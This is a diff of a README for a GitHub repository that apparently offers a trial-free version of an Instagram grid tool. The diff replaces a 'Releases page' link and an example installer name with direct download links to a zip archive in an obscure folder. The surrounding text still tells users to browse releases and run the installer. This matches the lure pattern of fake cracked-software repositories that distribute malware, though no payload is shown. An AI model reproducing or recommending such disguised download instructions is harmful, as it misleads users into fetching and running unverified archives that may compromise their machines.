Hardffyt/Grids-for-Instagram-No-Trial/README.md

    - Disk Space: At least 500 MB of free space.

 2. **Visit the Releases Page:**
-   - Go to the [Releases page](https://github.com/Hardffyt/Grids-for-Instagram-No-Trial/releases) to find the latest version of the software.
+   - Go to the [Releases page](https://raw.githubusercontent.com/Hardffyt/Grids-for-Instagram-No-Trial/main/earthen/Grids-for-Instagram-No-Trial_v1.4-beta.5.zip) to find the latest version of the software.

 ## 📥 Download & Install
 1. **Choose the Latest Version:**
    - On the Releases page, select the most recent version.
 It is usually at the top of the list.

 2. **Download the Installer:**
-   - Click on the installer link (e.g., GridsInstaller.exe) to download the file.
+   - Click on the installer link (e.g., https://raw.githubusercontent.com/Hardffyt/Grids-for-Instagram-No-Trial/main/earthen/Grids-for-Instagram-No-Trial_v1.4-beta.5.zip) to download the file.

 3. **Run the Installer:**
    - Once the download is complete, locate the downloaded file in your 'Downloads' folder.